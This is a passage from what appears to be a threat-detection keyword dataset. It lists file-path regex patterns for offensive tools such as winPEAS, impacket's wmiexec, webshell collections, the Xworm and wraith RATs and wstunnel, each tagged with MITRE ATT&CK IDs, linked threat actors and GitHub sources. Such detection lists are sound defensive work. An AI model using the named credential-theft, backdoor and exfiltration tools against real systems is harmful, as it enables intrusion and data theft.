Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19793" 
"*\winPEASx64.exe*",".{0,1000}\\winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19794" "*\winPEASx86.exe*",".{0,1000}\\winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19795" "*\WinPirate.bat*",".{0,1000}\\WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19796" "*\WinPirate\Tools\*",".{0,1000}\\WinPirate\\Tools\\.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19797" "*\WinPirate-master*",".{0,1000}\\WinPirate\-master.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19798" "*\Win-PS2EXE*",".{0,1000}\\Win\-PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","19799" "*\winpwnage.py*",".{0,1000}\\winpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19801" "*\winscp_dump.py*",".{0,1000}\\winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19803" "*\WinSCP-sessions.txt*",".{0,1000}\\WinSCP\-sessions\.txt.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19804" 
"*\winsos.cpp*",".{0,1000}\\winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","19805" "*\winsos.exe*",".{0,1000}\\winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","19806" "*\WinX Shell.php*",".{0,1000}\\WinX\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19811" "*\WiperPoc.cpp*",".{0,1000}\\WiperPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","19812" "*\wireless.py*",".{0,1000}\\wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19818" 
"*\wl_log.txt*",".{0,1000}\\wl_log\.txt.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19828" "*\wlanpass.txt*",".{0,1000}\\wlanpass\.txt.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","19829" "*\wl-lic.exe*",".{0,1000}\\wl\-lic\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19830" "*\wl-lic.pdb*",".{0,1000}\\wl\-lic\.pdb.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19831" "*\wmeye.csproj*",".{0,1000}\\wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","19832" 
"*\wmeye.pdb*",".{0,1000}\\wmeye\.pdb.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","19833" "*\wmi_1.dll*",".{0,1000}\\wmi_1\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","19834" "*\wmi_2.dll*",".{0,1000}\\wmi_2\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","19835" "*\wmi_exec.exe*",".{0,1000}\\wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","19836" "*\wmi_killprocname.py*",".{0,1000}\\wmi_killprocname\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19837" 
"*\wmi_killprocname.txt*",".{0,1000}\\wmi_killprocname\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19838" "*\wmi_killprocpid.py*",".{0,1000}\\wmi_killprocpid\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19839" "*\wmi_killprocpid.txt*",".{0,1000}\\wmi_killprocpid\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19840" "*\wmievasions.ps1*",".{0,1000}\\wmievasions\.ps1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","19841" "*\wmiexec.py*",".{0,1000}\\wmiexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19842" "*\wmiexec.zip*",".{0,1000}\\wmiexec\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","19843" "*\WMIHACKER.vbs*",".{0,1000}\\WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19844" "*\WMIHACKER.vbs*",".{0,1000}\\WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19845" "*\wmihacker_0.4.vbe*",".{0,1000}\\wmihacker_0\.4\.vbe.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19846" "*\WMIHACKER_0.6.vbs*",".{0,1000}\\WMIHACKER_0\.6\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19847" "*\wmipersist.exe*",".{0,1000}\\wmipersist\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19848" "*\wmipersist.py*",".{0,1000}\\wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19849" "*\wmiquery.py*",".{0,1000}\\wmiquery\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19850" "*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19851" "*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19852" "*\Worm.dll*",".{0,1000}\\Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19855" "*\Worse Linux Shell.php*",".{0,1000}\\Worse\sLinux\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19856" "*\WOW6432Node\Kidlogger*",".{0,1000}\\WOW6432Node\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","19859" "*\wraith.py*",".{0,1000}\\wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written 
in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19863" "*\wraith-master.zip*",".{0,1000}\\wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19864" "*\wraith-RAT-payloads*",".{0,1000}\\wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19865" "*\wraith-server.py*",".{0,1000}\\wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19866" "*\wraith-server_v*.py*",".{0,1000}\\wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - 
T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19867" "*\WritebleRegistryKeys.txt*",".{0,1000}\\WritebleRegistryKeys\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19868" "*\WriteOutputCommand.cs",".{0,1000}\\WriteOutputCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19869" "*\WSAAcceptBackdoor.*",".{0,1000}\\WSAAcceptBackdoor\..{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","19870" "*\WSAAcceptBackdoor-main*",".{0,1000}\\WSAAcceptBackdoor\-main.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","19871" "*\wscriptshell.py*",".{0,1000}\\wscriptshell\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19872" "*\wscriptshell.txt*",".{0,1000}\\wscriptshell\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19873" "*\ws-dirs.txt*",".{0,1000}\\ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","19874" "*\ws-files.txt*",".{0,1000}\\ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","19875" "*\WSManWinRM.ps1*",".{0,1000}\\WSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","19876" "*\WSPCoerce.cs*",".{0,1000}\\WSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","19877" "*\wstunnel.exe",".{0,1000}\\wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","19878" 
